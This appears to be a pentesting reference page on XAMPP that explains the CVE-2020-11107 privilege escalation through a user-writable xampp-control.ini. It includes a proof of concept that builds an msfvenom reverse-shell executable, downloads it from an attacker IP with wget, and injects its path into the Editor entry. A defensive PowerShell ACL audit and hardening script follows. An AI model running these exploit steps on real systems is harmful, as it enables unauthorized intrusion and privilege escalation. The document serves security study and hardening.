XAMPP

XAMPP is a free, open-source, cross-platform web server solution stack package developed by Apache Friends. It is designed to provide an easy-to-install and ready-to-use environment for local web development and testing. The package bundles Apache HTTP Server, MariaDB database, and interpreters for PHP and Perl, along with additional tools such as phpMyAdmin for database management, FileZilla FTP Server, Mercury Mail Transport System, and optional components like Tomcat for Java applications.

Its architecture is intended for offline use, allowing developers to run fully functional web applications on a local machine without the need for a remote hosting environment. Installation is streamlined, requiring minimal configuration, and the entire stack can be started, stopped, or adjusted through a graphical control panel. XAMPP supports Windows, Linux, and macOS, offering a consistent environment across platforms.

Configuration files for Apache, PHP, and MariaDB are accessible and modifiable, enabling customization of the server environment to suit different development needs. Due to its open configuration by default—such as unrestricted database access and disabled authentication for certain utilities—it is intended strictly for local development and not for production deployment without hardening.

Local PE

XAMPP versions prior to 7.2.29, 7.3.x prior to 7.3.16, and 7.4.x prior to 7.4.4 on Windows are affected by a privilege escalation and arbitrary command execution vulnerability (CVE-2020-11107) due to insecure permissions on the xampp-control.ini configuration file. This file, which defines startup parameters for the XAMPP Control Panel executable (xampp-control.exe), is writable by unprivileged users.

By modifying specific entries within xampp-control.ini, an attacker with local, non-administrative access can alter executable paths or parameters to include malicious commands. When the XAMPP Control Panel is subsequently launched—either by an administrative user or during normal operation—these injected commands are executed with the privileges of the launching user. A working PoC is available.

# Generate a payload 
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f exe -o shell.exe
# Transfer the payload to the target
> wget http://192.168.45.241:443/shell.exe -o shell.exe

# Define the target file
> $file = "C:\xampp\xampp-control.ini"

# Extract the current editor value (third line, index 2: Editor=notepad.exe)
> $find = ((Get-Content $file)[2] -Split "=")[1]

# Define the payload
> $replace = "C:\users\mike\shell.exe"

# Inject the payload binary
> (Get-Content $file) -replace $find, $replace | Set-Content $file
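The condition the PoC above depends on is an ACL on xampp-control.ini that grants write access to non-administrative principals. The following PowerShell audit script is an added example for this page, not code from XAMPP or from the PoC author: it reports every Allow ACE on the file that carries write-class rights for a principal other than SYSTEM or Administrators, shows what the Editor= entry currently points at, and with -Fix breaks inheritance on the file and downgrades those principals to ReadAndExecute. The install path C:\xampp and the set of trusted principals are assumptions, not values stated on the page.

```powershell
# Audit xampp-control.ini for the CVE-2020-11107 precondition (added example, not XAMPP code).
# Assumptions: default install path C:\xampp; only SYSTEM, Administrators and
# TrustedInstaller should hold write access to the control panel's configuration.
param(
    [string]$IniPath = 'C:\xampp\xampp-control.ini',
    [switch]$Fix
)

if (-not (Test-Path -LiteralPath $IniPath)) {
    Write-Error "Not found: $IniPath"
    exit 2
}

$trusted   = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
# Any of these rights lets a principal change the file contents or the ACL itself.
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, Delete, TakeOwnership, ChangePermissions'

function Get-RiskyAces {
    param([System.Security.AccessControl.FileSecurity]$Acl)
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($trusted -contains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) {
            [pscustomobject]@{
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

$acl      = Get-Acl -LiteralPath $IniPath
$findings = @(Get-RiskyAces -Acl $acl)

# Show the editor the control panel will invoke; the default value is notepad.exe.
$match = Select-String -LiteralPath $IniPath -Pattern '^\s*Editor\s*=\s*(.*)$' | Select-Object -First 1
$editorValue = if ($match) { $match.Matches[0].Groups[1].Value.Trim() } else { '<missing>' }
Write-Output "Editor entry: $editorValue"
if ($editorValue -ne 'notepad.exe') {
    Write-Warning "Editor entry differs from the default; review it for tampering."
}

if ($findings.Count -eq 0) {
    Write-Output "OK: no non-administrative principal can write $IniPath"
    exit 0
}

Write-Warning "Write access to $IniPath is granted to non-administrative principals:"
$findings | Format-Table -AutoSize | Out-String | Write-Output

if ($Fix) {
    # Inherited ACEs cannot be removed in place: first convert them to explicit ACEs
    # (protect + preserve), save, then re-read so the rules show as non-inherited.
    $acl.SetAccessRuleProtection($true, $true)
    Set-Acl -LiteralPath $IniPath -AclObject $acl
    $acl = Get-Acl -LiteralPath $IniPath

    foreach ($f in $findings) {
        $id = [System.Security.Principal.NTAccount]$f.Identity
        $old = New-Object System.Security.AccessControl.FileSystemAccessRule($id, 'FullControl', 'Allow')
        $null = $acl.RemoveAccessRuleAll($old)      # drop every Allow ACE for this identity
        $ro = New-Object System.Security.AccessControl.FileSystemAccessRule($id, 'ReadAndExecute', 'Allow')
        $acl.AddAccessRule($ro)                      # keep read access so the panel still works
    }
    Set-Acl -LiteralPath $IniPath -AclObject $acl
    Write-Output "Hardened: write access restricted to $($trusted -join ', ')"
    exit 0
}
exit 1
```

Run it from an elevated prompt; reading the ACL works as any user, but -Fix needs the right to change permissions on the file. The exit code (0 clean, 1 writable by untrusted principals, 2 file missing) makes it usable from a scheduled job or a configuration-management check, and the findings table shows whether the offending ACE is inherited from C:\xampp, in which case the same review should be applied to the whole installation directory, since the page notes the affected versions ship with the file writable by unprivileged users.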
